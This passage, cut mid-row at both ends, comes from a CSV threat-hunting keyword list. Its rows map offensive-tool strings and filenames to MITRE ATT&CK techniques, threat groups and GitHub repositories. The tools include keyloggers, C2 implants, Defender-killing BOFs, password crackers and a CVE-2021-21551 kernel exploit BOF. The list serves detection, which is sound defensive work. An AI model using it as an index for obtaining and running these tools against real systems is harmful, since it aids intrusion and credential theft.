APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernel-exploits*","offensive_tool_keyword","Github Username","github repo name hosting windows kernel exploits","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecWiki/windows-kernel-exploits","1","1","N/A","N/A","10","7475","2853","2021-06-11T23:29:15Z","2017-04-25T04:02:31Z" +"*KernelMii.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*KernelMii.x64.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*KernelMii.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*KernelMii.x86.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*KernelMii.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" 
+"*Kevin-Robertson/Inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*keychain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keylistattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*keylog_dump*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*keylog_dump*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*keylog_inject 
*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*keylog_inject.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*keylog_off*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*keylog_on*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*keylog_recorder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*keylog_recorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*keylog_start*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*keylog_stop*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*keylogger dump*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" +"*keylogger is already off*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*keylogger stopped*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is 
yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Keylogger*","offensive_tool_keyword","keylogger keyword","keylogger keyword. could be related to keylooger tools ","T1056.001 ","TA0006","N/A","N/A","POST Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Keylogger.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Keylogger.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Keylogger.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Keylogger.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*keylogger.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*keylogrecorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*keylooger.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*keyring2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keyscan dump*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*keyscan start*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*keyscan stop*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*keystore2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*KeyTabExtract*","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/sosdave/KeyTabExtract","1","0","N/A","N/A","2","145","36","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z" +"*keyword_obfuscation*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - 
TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*kgretzky*","offensive_tool_keyword","Github Username","username Kuba Gretzky hosting sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kgretzky/evilqr*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" +"*kgretzky/pwndrop*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*kh4sh3i/Spring-CVE*","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","13","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" +"*khast3x*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/khast3x","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*khast3x/h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - 
T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*Kicking off download cradle in a new process*","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*kick-operator -n *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - 
T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*killAllNimplants*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*killav.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*killdefender check*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"*killdefender kill*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 